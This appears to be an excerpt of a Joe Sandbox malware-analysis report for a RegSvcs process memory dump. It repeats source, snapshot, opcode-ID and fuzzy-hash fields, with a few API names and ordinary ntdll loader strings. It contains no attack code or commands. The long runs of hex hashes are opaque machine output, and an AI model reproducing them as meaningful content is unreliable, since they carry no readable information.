                                                        • Instruction Fuzzy Hash: D1F02B33284A339BD7325A9D4C40B2FAA9A9FD1B64F1E0039F2099B74CCA658D0397D0
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.1646176772.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_15f0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 4192285dea0a92dac813158ed676254244fc85c411f82acb43d2eb4578afeb8e
                                                        • Instruction ID: 89fd39f42cdf809fa47def846fa389f30da4bb84228c50cd083b39c6618ddd1d
                                                        • Opcode Fuzzy Hash: 4192285dea0a92dac813158ed676254244fc85c411f82acb43d2eb4578afeb8e
                                                        • Instruction Fuzzy Hash: 40014475A10209EFCB04DFA9D951AAEB7F9FF58304F10805AF904E7351D674AE01CBA4
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.1646176772.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_15f0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: a7d360a58d26b206584a9361827ac99da1857a0cacc1a07ca14397588a462b85
                                                        • Instruction ID: 68a54f6a9c0fe3ea2447e96272ee55590975c57ecaa057428bdeca458c42af73
                                                        • Opcode Fuzzy Hash: a7d360a58d26b206584a9361827ac99da1857a0cacc1a07ca14397588a462b85
                                                        • Instruction Fuzzy Hash: C6014471A00209EFDB04DFA9D945A9EB7F8FF58304F50405AFA14E7350D6749D01CBA4
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.1646176772.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_15f0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 6225b3f56bb7e4a8823ac3bf287c1186c08f5b75335344108ff231fc305a603f
                                                        • Instruction ID: b877054225ef4e3350f45bcc1562641029af9934b5ce7729de936fe31b072a35
                                                        • Opcode Fuzzy Hash: 6225b3f56bb7e4a8823ac3bf287c1186c08f5b75335344108ff231fc305a603f
                                                        • Instruction Fuzzy Hash: 4701D1322016899BE722971DCD09F59BF9DEF82B50F0840A9FE04CB7A1D77AC801C614
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.1646176772.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_15f0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: b627fec25eb6c257f11bb661ccd3427e14fda07872aab31bb01d22e531437400
                                                        • Instruction ID: ab05798bc39431e93aed1aa5a08349eb7750dde63312b09564f159c227f0e74c
                                                        • Opcode Fuzzy Hash: b627fec25eb6c257f11bb661ccd3427e14fda07872aab31bb01d22e531437400
                                                        • Instruction Fuzzy Hash: EC014F71A002499BDB04DFA9D945AEEBBF8FF59310F14405EE505E7380D774EA01CB98
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.1646176772.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_15f0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: dbb06fbea8421d8b96890fd2b120b20d820a8046168cc589f8d54c87f08ef009
                                                        • Instruction ID: ab26306ed7abc651caa3486531b9fbdb3f63f89b3d691d0ae7b1c26bf4fdd2a0
                                                        • Opcode Fuzzy Hash: dbb06fbea8421d8b96890fd2b120b20d820a8046168cc589f8d54c87f08ef009
                                                        • Instruction Fuzzy Hash: 63F01D7220001EBFEF019F94DD80DAF7B7EEB59298B144129FA1192160D635DD21ABA0
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.1646176772.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_15f0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: a97a19f1e511e6cac47997f9e3e7c49fcdf049b4e51916ca43bc9068e806d256
                                                        • Instruction ID: 7a96578ee20f513b93201952295299f1c8610d7e4bf7d31fecfe129c23fc849b
                                                        • Opcode Fuzzy Hash: a97a19f1e511e6cac47997f9e3e7c49fcdf049b4e51916ca43bc9068e806d256
                                                        • Instruction Fuzzy Hash: 41018536100209ABCF229E88DC40EDA3F66FB4C664F068106FE1866220C332D971EF81
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.1646176772.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_15f0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID: InitializeThunk
                                                        • String ID:
                                                        • API String ID: 2994545307-0
                                                        • Opcode ID: f268014f5b36dd47205359f7be8fc84b7b9aa6172b175031e908054a826666ec
                                                        • Instruction ID: ac89d9ff6d4360a035e89b91db0c607bc7769fc531e1fbe000be121a3dbb5944
                                                        • Opcode Fuzzy Hash: f268014f5b36dd47205359f7be8fc84b7b9aa6172b175031e908054a826666ec
                                                        • Instruction Fuzzy Hash: DFE092721009649BC321BB2ADD11F8A779BEBA0364F01451DF11557190CB34A810CB88
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.1646176772.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_15f0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 1c3962ef014767a9d047a1ce435ecdb8fc5cd5a05dfca32f291fec24eb47eca0
                                                        • Instruction ID: 11075065e1952e5a71b727dee611c90a3d2445752fccacb43a72d6b9d5f571e0
                                                        • Opcode Fuzzy Hash: 1c3962ef014767a9d047a1ce435ecdb8fc5cd5a05dfca32f291fec24eb47eca0
                                                        • Instruction Fuzzy Hash: 9EE09231411611DFE7326F6ACC48B527BE6FF90711F148C2CA096026B0C77598C0CA84
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.1646176772.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_15f0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: d217a6aac874400d2fdd0dd0cc4ad7a97c57c110d53f39d941a96e3fabb04b1b
                                                        • Instruction ID: 3e54f2af64bcba3538ff31bcdac1f988267824f8cb2536bf98f42b7b8837fced
                                                        • Opcode Fuzzy Hash: d217a6aac874400d2fdd0dd0cc4ad7a97c57c110d53f39d941a96e3fabb04b1b
                                                        • Instruction Fuzzy Hash: C9E0C2343403058FE715CF19C840B627BB6BFD5A10F68C068A9488F305EB72E842DB50
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.1646176772.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_15f0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 32e6c360de6b8f9f6226271e6501f8c22bf10e250ad6ee5f4e99511991abbe8f
                                                        • Instruction ID: 1a0580ef3ef2e139f4e1af32d1e53bab0d7539e59d598f1dc568c1d2eaf02ede
                                                        • Opcode Fuzzy Hash: 32e6c360de6b8f9f6226271e6501f8c22bf10e250ad6ee5f4e99511991abbe8f
                                                        • Instruction Fuzzy Hash: A7D02B328851306ACFB5E11C7C04FD33E5E9B40320F018870FE0893011D554CC8282D8
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.1646176772.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_15f0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 2b708af5a461c1f99ac8d3b2cba32ed51933f6cdd1bf79975374bbcdf42faac7
                                                        • Instruction ID: 8bd124ecb3fd4c40624c7c9645de8e39823c2930c51d04a079230b39bd17d2d5
                                                        • Opcode Fuzzy Hash: 2b708af5a461c1f99ac8d3b2cba32ed51933f6cdd1bf79975374bbcdf42faac7
                                                        • Instruction Fuzzy Hash: 2AE0C231000A10EFDB332F16DC10F9176AAFF94B10F24882DE081171A887B4AC82CB88
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.1646176772.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_15f0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 1dc954f8d7f76370de5ca63e9d7873f68480679358ddafcd3c04e67fab172053
                                                        • Instruction ID: 5be32a6d9f4c4cd01f49a0650df9767827579cad59d1330ae1e4a356a68a6b4d
                                                        • Opcode Fuzzy Hash: 1dc954f8d7f76370de5ca63e9d7873f68480679358ddafcd3c04e67fab172053
                                                        • Instruction Fuzzy Hash: BCE0C2332018606BC321FB5DDD10F4A739FEFA4370F014229F15187690CA64AC00CB98
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.1646176772.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_15f0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 2a1cd49be4a36f16e465d6e8719326e712c3afc978f3fe3bf45b66f7a6b88852
                                                        • Instruction ID: 71672e3dd4ff03d6310fdac111b6c7eaa09e0f07bb39de863a608dd33b25b281
                                                        • Opcode Fuzzy Hash: 2a1cd49be4a36f16e465d6e8719326e712c3afc978f3fe3bf45b66f7a6b88852
                                                        • Instruction Fuzzy Hash: 95D05E36511A50AFD3329F1BEE00C13BBF9FBC4A10705062EA54683A20C770AC06CBA0
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.1646176772.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_15f0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 7eba0efce7d9c3098aed64107f138979cd55621edccfcfde5a0f983e140fadca
                                                        • Instruction ID: 6b39d9ed5fece23d79bc538b520984440872c2af2e3942d0866b4facff303685
                                                        • Opcode Fuzzy Hash: 7eba0efce7d9c3098aed64107f138979cd55621edccfcfde5a0f983e140fadca
                                                        • Instruction Fuzzy Hash: C8D0A932214620ABDB32AA1CFC00FC333E9BB88720F06049DB008C7250C364AC81CA88
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.1646176772.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_15f0000_RegSvcs.jbxd
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.1646176772.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_15f0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: cd2b905cef66ad6a07b87ea3a770047ca010ce8a26a738e073bc989f41f91d20
                                                        • Instruction ID: a8a622882e7305bc52a6ecbf61ce57e479468eff335fd8617a0820ab1c71a580
                                                        • Opcode Fuzzy Hash: cd2b905cef66ad6a07b87ea3a770047ca010ce8a26a738e073bc989f41f91d20
                                                        • Instruction Fuzzy Hash: 2690026134140442D10075584818B070009D7E1301F55C125E5064654EC619CD526226
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.1646176772.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_15f0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 09a276320106d45e2f1116ec997258b03398b2108c07911e1bface4d6df402b4
                                                        • Instruction ID: c1b14f7557f880ec428c1de71a6eff494f0090edb1a17938333871d27bef3753
                                                        • Opcode Fuzzy Hash: 09a276320106d45e2f1116ec997258b03398b2108c07911e1bface4d6df402b4
                                                        • Instruction Fuzzy Hash: 71900221211C0042D20079684C18B07000997D0303F55C225A4154654DC9158D615621
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.1646176772.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_15f0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 196792a3c5c3028075dd2515d74ec65bf2135817d1393ebdbbc2d89cf798ceba
                                                        • Instruction ID: cde5eee2dde60fb12ba3673562aa9dfe6ad695fb9235b311a3c09cdd6748dea5
                                                        • Opcode Fuzzy Hash: 196792a3c5c3028075dd2515d74ec65bf2135817d1393ebdbbc2d89cf798ceba
                                                        • Instruction Fuzzy Hash: 6090023120180402D10075584C0C747000997D0302F55C121A9164655FC665CD916631
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.1646176772.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_15f0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: a709a8b62622e0cd41b5351a4dccd56adef63b108c3473c6b3fa70fea500bea7
                                                        • Instruction ID: ccae4fdb42f9bdcf6bc8ffd2f993fdb2c939bc55f91398df76c5896a7296b46f
                                                        • Opcode Fuzzy Hash: a709a8b62622e0cd41b5351a4dccd56adef63b108c3473c6b3fa70fea500bea7
                                                        • Instruction Fuzzy Hash: 8890022160140042414075688C489074009BBE1211755C231A4998650EC5598D655765
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.1646176772.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_15f0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 628dda09b86533d8452499ada396680227262830ad24452897e47d6e737e6ad5
                                                        • Instruction ID: 8e3bd5dde2208af87f2cde39045525fa13dfe0f9ddd9418f29816b31d6598206
                                                        • Opcode Fuzzy Hash: 628dda09b86533d8452499ada396680227262830ad24452897e47d6e737e6ad5
                                                        • Instruction Fuzzy Hash: 0090023120180402D10075584C1870B000997D0302F55C121A5164655EC6258D516671
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.1646176772.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_15f0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 251f4b6a821b4dae1bc8e282d41af02f673c7f43223117878e81d7e17721ac02
                                                        • Instruction ID: 28b4aa8a27c52bdb473f534cc1543feffdf9c8c955c686446f88b64c2fbdf526
                                                        • Opcode Fuzzy Hash: 251f4b6a821b4dae1bc8e282d41af02f673c7f43223117878e81d7e17721ac02
                                                        • Instruction Fuzzy Hash: D390022130140402D10275584818607000DD7D1345F95C122E5424655EC6258E53A232
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.1646176772.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_15f0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: dfb01950cebd3f143f80a51df945819977e51e90c1b4a60cb034144e341048ba
                                                        • Instruction ID: 2e1ce91a7f488cadfe6d5accc48841c232ef44864bdd3301af7ea65ca856c242
                                                        • Opcode Fuzzy Hash: dfb01950cebd3f143f80a51df945819977e51e90c1b4a60cb034144e341048ba
                                                        • Instruction Fuzzy Hash: CB90026120180403D14079584C08607000997D0302F55C121A6064655FCA298D516235
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.1646176772.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_15f0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 6eefed697dc7baac61e392c7d45b1c304182fdb8af345db80c3faabc59ac4dc2
                                                        • Instruction ID: 577adceda164299ae625314c4a374c6e25363ad44c8e2849a63a6511d0c8ee05
                                                        • Opcode Fuzzy Hash: 6eefed697dc7baac61e392c7d45b1c304182fdb8af345db80c3faabc59ac4dc2
                                                        • Instruction Fuzzy Hash: 6590027120140402D14075584808747000997D0301F55C121A9064654FC6598ED56765
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.1646176772.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_15f0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: c18c85a2a4449529f2e95d2012287dac07077f080482b6f20e5403bfcbc632c3
                                                        • Instruction ID: 190e5d8c0731743c04a734760077fd6fbc74101c49768f65093c7f9ad80c4862
                                                        • Opcode Fuzzy Hash: c18c85a2a4449529f2e95d2012287dac07077f080482b6f20e5403bfcbc632c3
                                                        • Instruction Fuzzy Hash: AE90022160140502D10175584808617000E97D0241F95C132A5024655FCA258E92A231
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.1646176772.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_15f0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 0ddb72e3fa5236036507f83a405d4909127a66257fbba038359a560d4d7a7a3d
                                                        • Instruction ID: 5bf35cadd7e2c6f50c0be09b2cdf374bad197f798c10bb2bd2c0950b371a3ced
                                                        • Opcode Fuzzy Hash: 0ddb72e3fa5236036507f83a405d4909127a66257fbba038359a560d4d7a7a3d
                                                        • Instruction Fuzzy Hash: 5190022120184442D14076584C08B0F410997E1202F95C129A8156654DC9158D555721
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.1646176772.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_15f0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 2fc840ba902719ad8d1c07bc546d21e5b59a82cd960bce62bf7da605965aa908
                                                        • Instruction ID: 645c554d91c7dd2b096e7a8a6f325b0e3d09248151e35dc0ca6f73ba7007cbd5
                                                        • Opcode Fuzzy Hash: 2fc840ba902719ad8d1c07bc546d21e5b59a82cd960bce62bf7da605965aa908
                                                        • Instruction Fuzzy Hash: 3290022124140802D14075588818707000AD7D0601F55C121A4024654EC6168E6567B1
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.1646176772.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_15f0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: ac69a2c92f80cb18f022a150538a136a979c63ece78f3e07f05e676db4940835
                                                        • Instruction ID: 709dd3cde8461db2643c8a009b63afea99958237d777b056589764d5c2370d56
                                                        • Opcode Fuzzy Hash: ac69a2c92f80cb18f022a150538a136a979c63ece78f3e07f05e676db4940835
                                                        • Instruction Fuzzy Hash: 7890022124545102D150755C48086174009B7E0201F55C131A4814694EC5558D556321
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.1646176772.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_15f0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 85bb78430f2524da7fedfbfb4cd7fc4ad20175ac443501e7f92955c2c9e3442e
                                                        • Instruction ID: 4493e6d715561b4e96ceef525f78d4a5cd6c6e48e7899f31d13cac6eaf019118
                                                        • Opcode Fuzzy Hash: 85bb78430f2524da7fedfbfb4cd7fc4ad20175ac443501e7f92955c2c9e3442e
                                                        • Instruction Fuzzy Hash: 7A90023520140402D51075585C08647004A97D0301F55D521A4424658EC6548DA1A221
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.1646176772.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_15f0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 830741c4cf8d523f6af5ddba51f0b38962d5c3529b4b680c0f014cd8e1397e9b
                                                        • Instruction ID: e745e012469c149039ed82dc5b28fd8169708aad1bf83794a589d82050dd0faf
                                                        • Opcode Fuzzy Hash: 830741c4cf8d523f6af5ddba51f0b38962d5c3529b4b680c0f014cd8e1397e9b
                                                        • Instruction Fuzzy Hash: 8B90023120240142954076585C08A4F410997E1302B95D525A4015654DC9148D615321
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.1646176772.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_15f0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                        • Instruction ID: 78dfd5bbceb54ca91cd4a2a6c994c42a56b28f6f3cc7643338e06eb382223418
                                                        • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                        • Instruction Fuzzy Hash:
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.1646176772.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_15f0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID: ___swprintf_l
                                                        • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                        • API String ID: 48624451-2108815105
                                                        • Opcode ID: 948af4cab237965f37d761f4e84b4512b4044e34852d258e03040aea7b0814be
                                                        • Instruction ID: ce194fdff84d1b593d1b185d3136e6137ad8f754359c274ef26e8b7cca4ecd4a
                                                        • Opcode Fuzzy Hash: 948af4cab237965f37d761f4e84b4512b4044e34852d258e03040aea7b0814be
                                                        • Instruction Fuzzy Hash: 2851C1A6A00116AFDB11DFAD8CA097EFBBCBB48240714C26DE5A5D7641E334DE44CBA0
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.1646176772.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_15f0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID: ___swprintf_l
                                                        • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                        • API String ID: 48624451-2108815105
                                                        • Opcode ID: 5592e1dc890cb781fbb9ef2ffa511580059445618b5f1afbd58cf7d94a150669
                                                        • Instruction ID: b8020b33eb3e15f3bb24b63ce8950c95fa9a03a5598a4e48a96c4c453be463de
                                                        • Opcode Fuzzy Hash: 5592e1dc890cb781fbb9ef2ffa511580059445618b5f1afbd58cf7d94a150669
                                                        • Instruction Fuzzy Hash: C651F371E00646AEDB31DF9CCDA097FBBF9EB48200B44846DE996D7741E774EA408760
                                                        Strings
                                                        • CLIENT(ntdll): Processing section info %ws..., xrefs: 01694787
                                                        • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 01694742
                                                        • Execute=1, xrefs: 01694713
                                                        • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 01694655
                                                        • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 016946FC
                                                        • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 01694725
                                                        • ExecuteOptions, xrefs: 016946A0
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.1646176772.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_15f0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                        • API String ID: 0-484625025
                                                        • Opcode ID: 81748505eede7396846bc77844bfd639d9d9dbc2a6e5a79c5f8176d04d01ddf4
                                                        • Instruction ID: f3310e1e7e8f608aa82388ddabfb9bc1c68b09dff8a519509402f7998e2365d1
                                                        • Opcode Fuzzy Hash: 81748505eede7396846bc77844bfd639d9d9dbc2a6e5a79c5f8176d04d01ddf4
                                                        • Instruction Fuzzy Hash: 29510A31600219ABEF11ABA8EC95FBE77ADEF15300F44009DDA05A72C1EB71DE468F65
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.1646176772.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_15f0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID: __aulldvrm
                                                        • String ID: +$-$0$0
                                                        • API String ID: 1302938615-699404926
                                                        • Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                        • Instruction ID: 7e6c579203cbbf6e7dac689b0676e96cd63d7393096f6ad8fc0b519d328bd646
                                                        • Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                        • Instruction Fuzzy Hash: EF81BC30B0525ADEEF258E68CC917BEBFAAAF45320F18411AD961E7391C73898418B65
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.1646176772.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_15f0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID: ___swprintf_l
                                                        • String ID: %%%u$[$]:%u
                                                        • API String ID: 48624451-2819853543
                                                        • Opcode ID: ff9d13505efff531388e71bbd723e7cf8e02035a98879faaaac71cf3b2a04125
                                                        • Instruction ID: 54bae808f98891ac4f5ffdb8972747ea4e9e2e1ef3f8917c43491ddd80d68484
                                                        • Opcode Fuzzy Hash: ff9d13505efff531388e71bbd723e7cf8e02035a98879faaaac71cf3b2a04125
